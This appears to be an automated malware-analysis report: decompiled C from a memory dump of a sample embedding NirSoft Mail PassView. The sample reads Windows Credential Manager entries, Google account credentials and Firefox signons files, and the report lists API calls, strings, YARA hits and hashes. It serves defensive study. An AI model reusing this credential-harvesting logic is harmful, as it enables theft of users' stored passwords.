                                                                                              					_push(_a12);
                                                                                              					E00407EFB(_t38, _t55);
                                                                                              					DestroyMenu(_t48);
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}











                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 004080C4
                                                                                              • LoadMenuA.USER32 ref: 004080D2
                                                                                                • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                                • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                                • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                                • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                              • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                              • sprintf.MSVCRT ref: 00408134
                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                              • memset.MSVCRT ref: 00408165
                                                                                              • GetWindowTextA.USER32 ref: 00408176
                                                                                              • EnumChildWindows.USER32 ref: 0040819E
                                                                                              • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                              • API String ID: 3259144588-3822380221
                                                                                              • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                              • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                              • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                              • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E056() {
                                                                                              				void* _t1;
                                                                                              				_Unknown_base(*)()* _t2;
                                                                                              				struct HINSTANCE__* _t4;
                                                                                              
                                                                                              				if( *0x417514 != 0) {
                                                                                              					return _t1;
                                                                                              				}
                                                                                              				_t2 = GetModuleHandleA("kernel32.dll");
                                                                                              				_t4 = _t2;
                                                                                              				if(_t4 == 0) {
                                                                                              					L9:
                                                                                              					return _t2;
                                                                                              				}
                                                                                              				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                              				 *0x416fe0 = _t2;
                                                                                              				if(_t2 != 0) {
                                                                                              					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                              					 *0x416fd8 = _t2;
                                                                                              					if(_t2 != 0) {
                                                                                              						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                              						 *0x416fd4 = _t2;
                                                                                              						if(_t2 != 0) {
                                                                                              							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                              							 *0x416e6c = _t2;
                                                                                              							if(_t2 != 0) {
                                                                                              								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                              								 *0x416fcc = _t2;
                                                                                              								if(_t2 != 0) {
                                                                                              									 *0x417514 = 1;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				goto L9;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                              • API String ID: 667068680-3953557276
                                                                                              • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                              • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                              • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                              • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                                                                              				void* __esi;
                                                                                              				struct HINSTANCE__* _t12;
                                                                                              				struct HINSTANCE__** _t23;
                                                                                              
                                                                                              				_t23 = __eax;
                                                                                              				E004046C2(__eax);
                                                                                              				_t12 = LoadLibraryA("advapi32.dll");
                                                                                              				 *_t23 = _t12;
                                                                                              				if(_t12 != 0) {
                                                                                              					_t23[2] = GetProcAddress(_t12, "CredReadA");
                                                                                              					_t23[3] = GetProcAddress( *_t23, "CredFree");
                                                                                              					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
                                                                                              					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
                                                                                              					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
                                                                                              					if(_t23[2] == 0 || _t23[3] == 0) {
                                                                                              						E004046C2(_t23);
                                                                                              					} else {
                                                                                              						_t23[1] = 1;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t23[1];
                                                                                              			}







                                                                                              APIs
                                                                                                • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,7554F420), ref: 004046C9
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                              • API String ID: 2449869053-4258758744
                                                                                              • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                              • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                              • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                              • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                                                              				void _v8;
                                                                                              				void _v12;
                                                                                              				void _v24;
                                                                                              				char _v39;
                                                                                              				void _v40;
                                                                                              				char _v132;
                                                                                              				void _v1156;
                                                                                              				void _v1172;
                                                                                              				char _v1180;
                                                                                              				void _v1187;
                                                                                              				char _v1188;
                                                                                              				void _v2228;
                                                                                              				void _v2243;
                                                                                              				void _v2244;
                                                                                              				void _v3267;
                                                                                              				char _v3268;
                                                                                              				void _v4291;
                                                                                              				char _v4292;
                                                                                              				char _v5340;
                                                                                              				void _v5347;
                                                                                              				char _v5348;
                                                                                              				char _v6116;
                                                                                              				char _v7136;
                                                                                              				void _v7140;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				int _t86;
                                                                                              				void* _t109;
                                                                                              				void* _t122;
                                                                                              				void* _t135;
                                                                                              				char _t156;
                                                                                              				signed char _t168;
                                                                                              				signed int _t171;
                                                                                              				intOrPtr _t177;
                                                                                              				signed int _t183;
                                                                                              				void* _t185;
                                                                                              
                                                                                              				_t171 = __edx;
                                                                                              				E004118A0(0x1be4, __ecx);
                                                                                              				_t156 = 0;
                                                                                              				_v3268 = 0;
                                                                                              				memset( &_v3267, 0, 0x3ff);
                                                                                              				_a8 = E00410E8A(_a8,  &_v3268);
                                                                                              				_t86 = strlen(_a4);
                                                                                              				_v8 = _t86;
                                                                                              				if(_a8 > 4) {
                                                                                              					_t193 = _t86;
                                                                                              					if(_t86 > 0) {
                                                                                              						asm("movsd");
                                                                                              						asm("movsd");
                                                                                              						asm("movsb");
                                                                                              						_v2244 = 0;
                                                                                              						memset( &_v2243, 0, 0x41e);
                                                                                              						_v1188 = 0;
                                                                                              						memset( &_v1187, 0, 0x41e);
                                                                                              						_v5348 = 0;
                                                                                              						memset( &_v5347, 0, 0x41e);
                                                                                              						_v40 = 0;
                                                                                              						asm("stosd");
                                                                                              						asm("stosd");
                                                                                              						asm("stosd");
                                                                                              						asm("stosw");
                                                                                              						asm("stosb");
                                                                                              						_v4292 = 0;
                                                                                              						memset( &_v4291, 0, 0x3ff);
                                                                                              						E0040BC49( &_v132);
                                                                                              						E0040BC6D(_v8,  &_v132, _a4);
                                                                                              						_t181 =  &_v132;
                                                                                              						E0040BD0B( &_v39,  &_v132,  &_v2244);
                                                                                              						memcpy( &_v2228,  &_v24, 8);
                                                                                              						E0040BC49( &_v132);
                                                                                              						_push( &_v2244);
                                                                                              						_t109 = 0x18;
                                                                                              						E0040BC6D(_t109,  &_v132);
                                                                                              						E0040BD0B( &_v39, _t181,  &_v1188);
                                                                                              						memcpy( &_v1172,  &_v2244, 0x10);
                                                                                              						memcpy( &_v1156,  &_v24, 8);
                                                                                              						E0040BC49(_t181);
                                                                                              						_push( &_v1188);
                                                                                              						_t122 = 0x28;
                                                                                              						E0040BC6D(_t122, _t181);
                                                                                              						E0040BD0B( &_v39, _t181,  &_v5348);
                                                                                              						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
                                                                                              						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                                                              						_t177 = _a8;
                                                                                              						asm("cdq");
                                                                                              						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                                                              						_a4 = 0;
                                                                                              						if(_t183 > 0) {
                                                                                              							do {
                                                                                              								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                                                              								_a4 =  &(_a4[1]);
                                                                                              							} while (_a4 < _t183);
                                                                                              							_t177 = _a8;
                                                                                              						}
                                                                                              						_t135 = 0;
                                                                                              						if(_t177 > _t156) {
                                                                                              							do {
                                                                                              								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                                                              								_t135 = _t135 + 1;
                                                                                              								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                                                              							} while (_t135 < _t177);
                                                                                              						}
                                                                                              						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                                                              						strcpy(_a12,  &_v7136);
                                                                                              						E0040BC49( &_v132);
                                                                                              						_t67 = _t177 - 4; // 0x0
                                                                                              						E0040BC6D(_t67,  &_v132, _a12);
                                                                                              						E0040BD0B(_t177,  &_v132,  &_v40);
                                                                                              						memcpy( &_v8,  &_v40, 4);
                                                                                              						memcpy( &_v12,  &_v7140, 4);
                                                                                              						_t156 = 1;
                                                                                              						 *_a16 = 0 | _v8 == _v12;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t156;
                                                                                              			}







































                                                                                              0x004111db
                                                                                              0x004111dd
                                                                                              0x004111f8
                                                                                              0x004111fd
                                                                                              0x00411203
                                                                                              0x00411206
                                                                                              0x00411206
                                                                                              0x00411209
                                                                                              0x0041120d
                                                                                              0x0041120f
                                                                                              0x00411216
                                                                                              0x0041121d
                                                                                              0x00411220
                                                                                              0x00411220
                                                                                              0x0041120f
                                                                                              0x00411233
                                                                                              0x0041123a
                                                                                              0x00411242
                                                                                              0x0041124a
                                                                                              0x00411250
                                                                                              0x0041125c
                                                                                              0x0041126b
                                                                                              0x0041127d
                                                                                              0x00411295
                                                                                              0x00411296
                                                                                              0x00411296
                                                                                              0x0041106b
                                                                                              0x0041129e

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041103A
                                                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                              • strlen.MSVCRT ref: 00411056
                                                                                              • memset.MSVCRT ref: 00411090
                                                                                              • memset.MSVCRT ref: 004110A4
                                                                                              • memset.MSVCRT ref: 004110B8
                                                                                              • memset.MSVCRT ref: 004110DE
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                              • memcpy.MSVCRT ref: 00411115
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                              • memcpy.MSVCRT ref: 00411151
                                                                                              • memcpy.MSVCRT ref: 00411163
                                                                                              • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                              • memcpy.MSVCRT ref: 0041126B
                                                                                              • memcpy.MSVCRT ref: 0041127D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$strcpy
                                                                                              • String ID: salu
                                                                                              • API String ID: 2660478486-4177317985
                                                                                              • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                              • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                              • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                              • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				intOrPtr* _v8;
                                                                                              				char _v76;
                                                                                              				void _v1099;
                                                                                              				char _v1100;
                                                                                              				void _v2123;
                                                                                              				char _v2124;
                                                                                              				void _v3147;
                                                                                              				char _v3148;
                                                                                              				char _v4172;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				void* _t36;
                                                                                              				void* _t37;
                                                                                              				void* _t48;
                                                                                              				void* _t55;
                                                                                              				intOrPtr* _t56;
                                                                                              				signed int _t58;
                                                                                              				intOrPtr* _t63;
                                                                                              				void* _t70;
                                                                                              				void* _t71;
                                                                                              
                                                                                              				_t56 = __ecx;
                                                                                              				E004118A0(0x1048, __ecx);
                                                                                              				_t63 = _t56;
                                                                                              				_v8 = _t63;
                                                                                              				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                              				_v1100 = 0;
                                                                                              				memset( &_v1099, 0, 0x3ff);
                                                                                              				_v3148 = 0;
                                                                                              				memset( &_v3147, 0, 0x3ff);
                                                                                              				_v2124 = 0;
                                                                                              				memset( &_v2123, 0, 0x3ff);
                                                                                              				_t71 = _t70 + 0x2c;
                                                                                              				if( *0x417308 != 0) {
                                                                                              					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                                                              					_t71 = _t71 + 0xc;
                                                                                              				}
                                                                                              				if( *0x417304 != 0) {
                                                                                              					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                                                              				}
                                                                                              				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                                                              				_t58 = 0x10;
                                                                                              				_push(_t36);
                                                                                              				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                                                              				asm("movsb");
                                                                                              				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                                                              				E00405EFD(_a4,  &_v4172);
                                                                                              				_push("Mail PassView");
                                                                                              				_t55 = 6;
                                                                                              				_push(E004078FF(_t55));
                                                                                              				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                              				_t48 = E00405EFD(_a4,  &_v2124);
                                                                                              				_t78 = _a8 - 4;
                                                                                              				if(_a8 == 4) {
                                                                                              					return E004097E6(_v8, _t78, _a4);
                                                                                              				}
                                                                                              				return _t48;
                                                                                              			}
























                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • memset.MSVCRT ref: 00403EBF
                                                                                              • memset.MSVCRT ref: 00403ED3
                                                                                              • memset.MSVCRT ref: 00403EE7
                                                                                              • sprintf.MSVCRT ref: 00403F08
                                                                                              • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                              • sprintf.MSVCRT ref: 00403F5B
                                                                                              • sprintf.MSVCRT ref: 00403F8C
                                                                                              Strings
                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                              • Mail PassView, xrefs: 00403F72
                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                              • API String ID: 1043021993-495024357
                                                                                              • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                              • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                              • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                              • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				char _v280;
                                                                                              				char _v408;
                                                                                              				intOrPtr _v412;
                                                                                              				char _v796;
                                                                                              				intOrPtr _v800;
                                                                                              				char _v928;
                                                                                              				char _v940;
                                                                                              				wchar_t* _t23;
                                                                                              				char* _t41;
                                                                                              				wchar_t** _t59;
                                                                                              				void* _t76;
                                                                                              
                                                                                              				_t76 = __fp0;
                                                                                              				_t59 = _a4;
                                                                                              				_t23 =  *_t59;
                                                                                              				_v8 = __ecx;
                                                                                              				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                                                              					E004021D8( &_v940);
                                                                                              					_v800 = 7;
                                                                                              					_v412 = 3;
                                                                                              					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                                                              					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                                                              					strcpy( &_v928,  &_v408);
                                                                                              					strcpy( &_v796,  &_v408);
                                                                                              					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                                                              						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                                                              					}
                                                                                              					_t41 = strchr( &_v928, 0x40);
                                                                                              					if(_t41 != 0) {
                                                                                              						 *_t41 = 0;
                                                                                              					}
                                                                                              					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}
















                                                                                              APIs
                                                                                              • wcsstr.MSVCRT ref: 004042BD
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                              • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                              • strchr.MSVCRT ref: 00404349
                                                                                              • strlen.MSVCRT ref: 0040435D
                                                                                              • sprintf.MSVCRT ref: 0040437E
                                                                                              • strchr.MSVCRT ref: 0040438F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                              • API String ID: 1359934567-4070641962
                                                                                              • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                              • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                              • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                              • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                                                              				void _v4103;
                                                                                              				char _v4104;
                                                                                              				int _t21;
                                                                                              				int _t28;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t35 = __eflags;
                                                                                              				E004118A0(0x1004, __ecx);
                                                                                              				strcpy(0x4171b8, _a8);
                                                                                              				strcpy(0x4172c0, "general");
                                                                                              				E00407E55(_t35, "TranslatorName", 0x412466);
                                                                                              				E00407E55(_t35, "TranslatorURL", 0x412466);
                                                                                              				EnumResourceNamesA(_a4, 4, E004080A3, 0);
                                                                                              				EnumResourceNamesA(_a4, 5, E004080A3, 0);
                                                                                              				strcpy(0x4172c0, "strings");
                                                                                              				_t28 = 0;
                                                                                              				_v4104 = 0;
                                                                                              				memset( &_v4103, 0, 0x1000);
                                                                                              				do {
                                                                                              					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
                                                                                              					if(_t21 > 0) {
                                                                                              						_t21 = E00407EC3(_t28,  &_v4104);
                                                                                              					}
                                                                                              					_t28 = _t28 + 1;
                                                                                              				} while (_t28 <= 0xffff);
                                                                                              				 *0x4171b8 = 0;
                                                                                              				return _t21;
                                                                                              			}









                                                                                              APIs
                                                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                                • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                                • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                                • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                                                              • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                              • memset.MSVCRT ref: 00408306
                                                                                              • LoadStringA.USER32 ref: 0040831A
                                                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                              • API String ID: 1060401815-3647959541
                                                                                              • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                              • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                              • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                              • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t31;
                                                                                              				int _t40;
                                                                                              				void* _t44;
                                                                                              				void* _t49;
                                                                                              				char* _t50;
                                                                                              				void* _t57;
                                                                                              				int _t62;
                                                                                              				char* _t68;
                                                                                              				void* _t70;
                                                                                              				void* _t73;
                                                                                              				void* _t74;
                                                                                              				intOrPtr* _t86;
                                                                                              				char* _t89;
                                                                                              				void* _t90;
                                                                                              				char** _t91;
                                                                                              
                                                                                              				_t86 = __eax;
                                                                                              				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
                                                                                              				_t94 = _t31;
                                                                                              				if(_t31 == 0) {
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				E0040462E(_t86 + 0x468);
                                                                                              				_t68 = _t86 + 0x158;
                                                                                              				E004061FF(_t68, _a4);
                                                                                              				_t89 = _t86 + 0x25d;
                                                                                              				 *_t89 = 0;
                                                                                              				E0040C530(_t94, _t86 + 0x18);
                                                                                              				if( *_t89 == 0) {
                                                                                              					_t62 = strlen(_t68);
                                                                                              					 *_t91 = "signons.txt";
                                                                                              					_t9 = strlen(??) + 1; // 0x1
                                                                                              					if(_t62 + _t9 >= 0x104) {
                                                                                              						 *_t89 = 0;
                                                                                              					} else {
                                                                                              						E004062AD(_t89, _t86 + 0x158, "signons.txt");
                                                                                              					}
                                                                                              				}
                                                                                              				_v268 = 0;
                                                                                              				memset( &_v267, 0, 0x104);
                                                                                              				_t40 = strlen(_t86 + 0x158);
                                                                                              				_t91[3] = "signons.sqlite";
                                                                                              				_t15 = strlen(??) + 1; // 0x1
                                                                                              				_pop(_t73);
